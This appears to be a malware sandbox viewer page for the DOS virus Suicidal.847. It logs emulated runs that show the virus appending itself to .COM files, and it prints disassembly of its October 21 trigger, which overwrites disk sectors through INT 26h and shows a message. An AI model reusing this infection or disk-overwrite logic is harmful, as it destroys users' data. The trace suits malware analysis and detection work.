Sample viewer

vx.netlux.org/Virus.DOS.Suicidal.847

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:26:08.997956937Z 26 PC: 12b66 | Set disk transfer address
2018-12-17T22:26:08.999460242Z 71 PC: 12b70 | Get current directory
2018-12-17T22:26:09.002541864Z 78 PC: 12b86 | Find first file
2018-12-17T22:26:09.008819533Z 67 PC: 12bb8 | Get or set file attributes
2018-12-17T22:26:09.015259617Z 67 PC: 12bc8 | Get or set file attributes
2018-12-17T22:26:09.031641404Z 61 PC: 12bd1 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:26:09.043257924Z 87 PC: 12bd7 | Get or set file date and time
2018-12-17T22:26:09.045319511Z 63 PC: 12bec | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:26:09.052186356Z 66 PC: 12c4f | Move file pointer
2018-12-17T22:26:09.053825049Z 64 PC: 12c5a | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:26:09.056664392Z 66 PC: 12c62 | Move file pointer
2018-12-17T22:26:09.058614036Z 64 PC: 12c6d | Write file or device (Write 847 bytes on handle 5)
2018-12-17T22:26:09.067618407Z 87 PC: 12c0f | Get or set file date and time
2018-12-17T22:26:09.069427439Z 67 PC: 12c1d | Get or set file attributes
2018-12-17T22:26:09.074865281Z 62 PC: 12c21 | Close file
2018-12-17T22:26:09.082557625Z 78 PC: 12cc1 | Find first file
2018-12-17T22:26:09.08842976Z 78 PC: 12ce9 | Find first file
2018-12-17T22:26:09.095112254Z 79 PC: 12bab | Find next file
2018-12-17T22:26:09.098165068Z 67 PC: 12bb8 | Get or set file attributes
2018-12-17T22:26:09.110716077Z 67 PC: 12bc8 | Get or set file attributes
2018-12-17T22:26:09.126391675Z 61 PC: 12bd1 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:26:09.133652763Z 87 PC: 12bd7 | Get or set file date and time
2018-12-17T22:26:09.135321927Z 63 PC: 12bec | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:26:09.142616455Z 66 PC: 12c4f | Move file pointer
2018-12-17T22:26:09.143968998Z 64 PC: 12c5a | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:26:09.146520275Z 66 PC: 12c62 | Move file pointer
2018-12-17T22:26:09.148417997Z 64 PC: 12c6d | Write file or device (Write 847 bytes on handle 5)
2018-12-17T22:26:09.156498572Z 87 PC: 12c0f | Get or set file date and time
2018-12-17T22:26:09.157909377Z 67 PC: 12c1d | Get or set file attributes
2018-12-17T22:26:09.16330037Z 62 PC: 12c21 | Close file
2018-12-17T22:26:09.170783082Z 78 PC: 12cc1 | Find first file
2018-12-17T22:26:09.176320043Z 78 PC: 12ce9 | Find first file
2018-12-17T22:26:09.182947225Z 79 PC: 12bab | Find next file
2018-12-17T22:26:09.185414747Z 67 PC: 12bb8 | Get or set file attributes
2018-12-17T22:26:09.195770956Z 67 PC: 12bc8 | Get or set file attributes
2018-12-17T22:26:09.205232113Z 61 PC: 12bd1 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:26:09.210020084Z 87 PC: 12bd7 | Get or set file date and time
2018-12-17T22:26:09.211602762Z 63 PC: 12bec | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:26:09.218261962Z 66 PC: 12c4f | Move file pointer
2018-12-17T22:26:09.226551505Z 64 PC: 12c5a | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:26:09.229466493Z 66 PC: 12c62 | Move file pointer
2018-12-17T22:26:09.231377955Z 64 PC: 12c6d | Write file or device (Write 847 bytes on handle 5)
2018-12-17T22:26:09.239478038Z 87 PC: 12c0f | Get or set file date and time
2018-12-17T22:26:09.24097663Z 67 PC: 12c1d | Get or set file attributes
2018-12-17T22:26:09.245769157Z 62 PC: 12c21 | Close file
2018-12-17T22:26:09.253924357Z 78 PC: 12cc1 | Find first file
2018-12-17T22:26:09.264612418Z 78 PC: 12ce9 | Find first file
2018-12-17T22:26:09.270967194Z 79 PC: 12bab | Find next file
2018-12-17T22:26:09.273643353Z 67 PC: 12bb8 | Get or set file attributes
2018-12-17T22:26:09.279003469Z 67 PC: 12bc8 | Get or set file attributes
2018-12-17T22:26:09.288504726Z 61 PC: 12bd1 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:26:09.29516487Z 87 PC: 12bd7 | Get or set file date and time
2018-12-17T22:26:09.296512392Z 63 PC: 12bec | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:26:09.302740486Z 66 PC: 12c4f | Move file pointer
2018-12-17T22:26:09.304894847Z 64 PC: 12c5a | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:26:09.307293124Z 66 PC: 12c62 | Move file pointer
2018-12-17T22:26:09.308460294Z 64 PC: 12c6d | Write file or device (Write 847 bytes on handle 5)
2018-12-17T22:26:09.316466076Z 87 PC: 12c0f | Get or set file date and time
2018-12-17T22:26:09.317872485Z 67 PC: 12c1d | Get or set file attributes
2018-12-17T22:26:09.322253041Z 62 PC: 12c21 | Close file
2018-12-17T22:26:09.331244689Z 78 PC: 12cc1 | Find first file
2018-12-17T22:26:09.33720009Z 78 PC: 12ce9 | Find first file
2018-12-17T22:26:09.343066428Z 79 PC: 12bab | Find next file
2018-12-17T22:26:09.346108824Z 67 PC: 12bb8 | Get or set file attributes
2018-12-17T22:26:09.351438917Z 67 PC: 12bc8 | Get or set file attributes
2018-12-17T22:26:09.360705334Z 61 PC: 12bd1 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:26:09.371870376Z 87 PC: 12bd7 | Get or set file date and time
2018-12-17T22:26:09.373172796Z 63 PC: 12bec | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:26:09.379284757Z 66 PC: 12c4f | Move file pointer
2018-12-17T22:26:09.38120917Z 64 PC: 12c5a | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:26:09.383669091Z 66 PC: 12c62 | Move file pointer
2018-12-17T22:26:09.384930595Z 64 PC: 12c6d | Write file or device (Write 847 bytes on handle 5)
2018-12-17T22:26:09.393940314Z 87 PC: 12c0f | Get or set file date and time
2018-12-17T22:26:09.395315924Z 67 PC: 12c1d | Get or set file attributes
2018-12-17T22:26:09.400027971Z 62 PC: 12c21 | Close file
2018-12-17T22:26:09.407728244Z 78 PC: 12cc1 | Find first file
2018-12-17T22:26:09.413621489Z 78 PC: 12ce9 | Find first file
2018-12-17T22:26:09.419311207Z 78 PC: 12cc1 | Find first file
2018-12-17T22:26:09.430519652Z 78 PC: 12ce9 | Find first file
2018-12-17T22:26:09.440774552Z 59 PC: 12c80 | Change current directory
2018-12-17T22:26:09.44258963Z 42 PC: 12c84 | Get date
0x12c84: cmp dh, 0xa
0x12c87: jne 0x12c91
0x12c89: cmp dl, 0x15
0x12c8c: jne 0x12c91
0x12c8e: jmp 0x12c9f
0x12c90: nop
0x12c91: ret
0x12c92: mov ah, 0x3b
0x12c94: lea dx, word ptr [bp + 0x407]
0x12c98: int 0x21
0x12c9a: jb 0x12c74
0x12c9c: jmp 0x12b76
0x12c9f: mov al, 2
0x12ca1: mov cx, 0x29a
0x12ca4: mov dx, 0
0x12ca7: mov bx, 0x2c0
0x12caa: int 0x26
0x12cac: lea dx, word ptr [bp + 0x43b]
0x12cb0: mov ah, 9
0x12cb2: int 0x21

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4633,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:35.119619131Z 26 PC: 12b66 | Set disk transfer address
2018-12-25T11:52:35.122157648Z 71 PC: 12b70 | Get current directory
2018-12-25T11:52:35.125156803Z 78 PC: 12b86 | Find first file
2018-12-25T11:52:35.131546532Z 67 PC: 12bb8 | Get or set file attributes
2018-12-25T11:52:35.138506746Z 67 PC: 12bc8 | Get or set file attributes
2018-12-25T11:52:35.15665512Z 61 PC: 12bd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:35.168395565Z 87 PC: 12bd7 | Get or set file date and time
2018-12-25T11:52:35.170411096Z 63 PC: 12bec | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:35.176877357Z 66 PC: 12c4f | Move file pointer
2018-12-25T11:52:35.17834949Z 64 PC: 12c5a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:35.181292079Z 66 PC: 12c62 | Move file pointer
2018-12-25T11:52:35.183348591Z 64 PC: 12c6d | Write file or device (Write 847 bytes on handle 5)
2018-12-25T11:52:35.191684066Z 87 PC: 12c0f | Get or set file date and time
2018-12-25T11:52:35.193747258Z 67 PC: 12c1d | Get or set file attributes
2018-12-25T11:52:35.199637177Z 62 PC: 12c21 | Close file
2018-12-25T11:52:35.207200157Z 78 PC: 12cc1 | Find first file
2018-12-25T11:52:35.213041029Z 78 PC: 12ce9 | Find first file
2018-12-25T11:52:35.219483123Z 79 PC: 12bab | Find next file
2018-12-25T11:52:35.222546005Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.233359341Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.244711533Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.251351878Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.252666797Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.259476247Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.260718288Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.263150399Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.265257474Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.273473194Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.275307047Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.281455319Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.288992521Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.299882389Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.306199244Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:35.308803491Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.327303519Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.337564388Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.344335161Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.345594922Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.352635277Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.354486607Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.357830663Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.359380485Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.367768173Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.369162856Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.373651502Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.381495212Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.387142213Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.392751959Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:35.395870826Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.406074811Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.417912954Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.425454233Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.4266994Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.432848876Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.434713762Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.437167783Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.438616108Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.446823564Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.448190467Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.452828163Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.460481529Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.466132932Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.471674245Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:35.474865518Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.481713498Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.489618958Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.494055209Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.495043074Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.498906531Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.500483452Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.502251924Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.503466073Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.517551177Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.518771397Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.521847483Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.527213266Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.531238197Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.537972067Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.544781735Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.553244221Z 59 PC: 12c80 | Change current directory
2018-12-25T11:52:35.554849607Z 42 PC: 12c84 | Get date
0x12c84: cmp dh, 0xa
0x12c87: jne 0x12c91
0x12c89: cmp dl, 0x15
0x12c8c: jne 0x12c91
0x12c8e: jmp 0x12c9f
0x12c90: nop
0x12c91: ret
0x12c92: mov ah, 0x3b
0x12c94: lea dx, word ptr [bp + 0x407]
0x12c98: int 0x21
0x12c9a: jb 0x12c74
0x12c9c: jmp 0x12b76
0x12c9f: mov al, 2
0x12ca1: mov cx, 0x29a
0x12ca4: mov dx, 0
0x12ca7: mov bx, 0x2c0
0x12caa: int 0x26
0x12cac: lea dx, word ptr [bp + 0x43b]
0x12cb0: mov ah, 9
0x12cb2: int 0x21

{"DateBased":true,"Day":1,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4633,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:35.083972301Z 26 PC: 12b66 | Set disk transfer address
2018-12-25T11:52:35.085336517Z 71 PC: 12b70 | Get current directory
2018-12-25T11:52:35.087713586Z 78 PC: 12b86 | Find first file
2018-12-25T11:52:35.091499171Z 67 PC: 12bb8 | Get or set file attributes
2018-12-25T11:52:35.095349467Z 67 PC: 12bc8 | Get or set file attributes
2018-12-25T11:52:35.113144094Z 61 PC: 12bd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:35.120432565Z 87 PC: 12bd7 | Get or set file date and time
2018-12-25T11:52:35.12187991Z 63 PC: 12bec | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:35.129668737Z 66 PC: 12c4f | Move file pointer
2018-12-25T11:52:35.131300342Z 64 PC: 12c5a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:35.135077401Z 66 PC: 12c62 | Move file pointer
2018-12-25T11:52:35.137424911Z 64 PC: 12c6d | Write file or device (Write 847 bytes on handle 5)
2018-12-25T11:52:35.14685136Z 87 PC: 12c0f | Get or set file date and time
2018-12-25T11:52:35.148395739Z 67 PC: 12c1d | Get or set file attributes
2018-12-25T11:52:35.154484492Z 62 PC: 12c21 | Close file
2018-12-25T11:52:35.163598316Z 78 PC: 12cc1 | Find first file
2018-12-25T11:52:35.170426379Z 78 PC: 12ce9 | Find first file
2018-12-25T11:52:35.17796292Z 79 PC: 12bab | Find next file
2018-12-25T11:52:35.180825392Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.187085427Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.197890949Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.210791272Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.211970435Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.216340727Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.217906495Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.221569072Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.222792514Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.232047303Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.233649461Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.238770113Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.248059322Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.254709192Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.261137902Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:35.264610032Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.276805577Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.291426117Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.29993204Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.302060424Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.310242282Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.311759354Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.314700999Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.31618211Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.325121297Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.327214092Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.332424884Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.342471979Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.351252889Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.358176954Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:35.361395426Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.368841263Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.379759045Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.387264748Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.389633743Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.399283858Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.400803164Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.402853248Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.404474902Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.409839889Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.4110959Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.415635343Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.421228688Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.430742357Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.438007337Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:35.440362685Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.444750129Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.455324463Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.467296348Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.469369314Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.477097355Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.480495245Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.483783564Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.486296497Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.495210344Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.496884793Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.504150487Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.513314454Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.519790058Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.527201145Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.53953025Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.547656661Z 59 PC: 12c80 | Change current directory
2018-12-25T11:52:35.549174973Z 42 PC: 12c84 | Get date
0x12c84: cmp dh, 0xa
0x12c87: jne 0x12c91
0x12c89: cmp dl, 0x15
0x12c8c: jne 0x12c91
0x12c8e: jmp 0x12c9f
0x12c90: nop
0x12c91: ret
0x12c92: mov ah, 0x3b
0x12c94: lea dx, word ptr [bp + 0x407]
0x12c98: int 0x21
0x12c9a: jb 0x12c74
0x12c9c: jmp 0x12b76
0x12c9f: mov al, 2
0x12ca1: mov cx, 0x29a
0x12ca4: mov dx, 0
0x12ca7: mov bx, 0x2c0
0x12caa: int 0x26
0x12cac: lea dx, word ptr [bp + 0x43b]
0x12cb0: mov ah, 9
0x12cb2: int 0x21

{"DateBased":true,"Day":21,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4633,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:35.172392028Z 26 PC: 12b66 | Set disk transfer address
2018-12-25T11:52:35.174951947Z 71 PC: 12b70 | Get current directory
2018-12-25T11:52:35.178618443Z 78 PC: 12b86 | Find first file
2018-12-25T11:52:35.185309218Z 67 PC: 12bb8 | Get or set file attributes
2018-12-25T11:52:35.191579664Z 67 PC: 12bc8 | Get or set file attributes
2018-12-25T11:52:35.216481331Z 61 PC: 12bd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:35.228537733Z 87 PC: 12bd7 | Get or set file date and time
2018-12-25T11:52:35.230682426Z 63 PC: 12bec | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:35.241244424Z 66 PC: 12c4f | Move file pointer
2018-12-25T11:52:35.242849163Z 64 PC: 12c5a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:35.245850056Z 66 PC: 12c62 | Move file pointer
2018-12-25T11:52:35.248776322Z 64 PC: 12c6d | Write file or device (Write 847 bytes on handle 5)
2018-12-25T11:52:35.25816361Z 87 PC: 12c0f | Get or set file date and time
2018-12-25T11:52:35.259691611Z 67 PC: 12c1d | Get or set file attributes
2018-12-25T11:52:35.265285635Z 62 PC: 12c21 | Close file
2018-12-25T11:52:35.274134467Z 78 PC: 12cc1 | Find first file
2018-12-25T11:52:35.28107666Z 78 PC: 12ce9 | Find first file
2018-12-25T11:52:35.288233993Z 79 PC: 12bab | Find next file
2018-12-25T11:52:35.292274419Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.304473916Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.315374803Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.323166788Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.324733155Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.331841881Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.333807229Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.336825021Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.338426627Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.348022923Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.350002624Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.355431584Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.364941036Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.372455675Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.379672214Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:35.383968859Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.390401189Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.401347407Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.40909134Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.411040386Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.418468038Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.420072153Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.423715194Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.425588858Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.434853074Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.438159882Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.443495352Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.452186048Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.460412841Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.467027434Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:35.470329594Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.477903553Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.488756818Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.501885104Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.503885801Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.510906358Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.512142605Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.514921515Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.516742625Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.525577227Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.52723681Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.532396452Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.541142762Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.547619834Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.554822644Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:35.557920176Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.570496032Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.581962608Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.589309072Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.590802728Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.598584038Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.599949579Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.602648317Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.608232187Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.61738043Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.619551358Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.625813726Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.635445082Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.642202073Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.648849735Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.655496132Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.661773321Z 59 PC: 12c80 | Change current directory
2018-12-25T11:52:35.663652142Z 42 PC: 12c84 | Get date
0x12c84: cmp dh, 0xa
0x12c87: jne 0x12c91
0x12c89: cmp dl, 0x15
0x12c8c: jne 0x12c91
0x12c8e: jmp 0x12c9f
0x12c90: nop
0x12c91: ret
0x12c92: mov ah, 0x3b
0x12c94: lea dx, word ptr [bp + 0x407]
0x12c98: int 0x21
0x12c9a: jb 0x12c74
0x12c9c: jmp 0x12b76
0x12c9f: mov al, 2
0x12ca1: mov cx, 0x29a
0x12ca4: mov dx, 0
0x12ca7: mov bx, 0x2c0
0x12caa: int 0x26
0x12cac: lea dx, word ptr [bp + 0x43b]
0x12cb0: mov ah, 9
0x12cb2: int 0x21
2018-12-25T11:52:35.667221787Z 9 PC: 12cb4 | Display string (String= 'Happy Birthday Freaky!')

{"DateBased":true,"Day":21,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4633,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:35.735538683Z 26 PC: 12b66 | Set disk transfer address
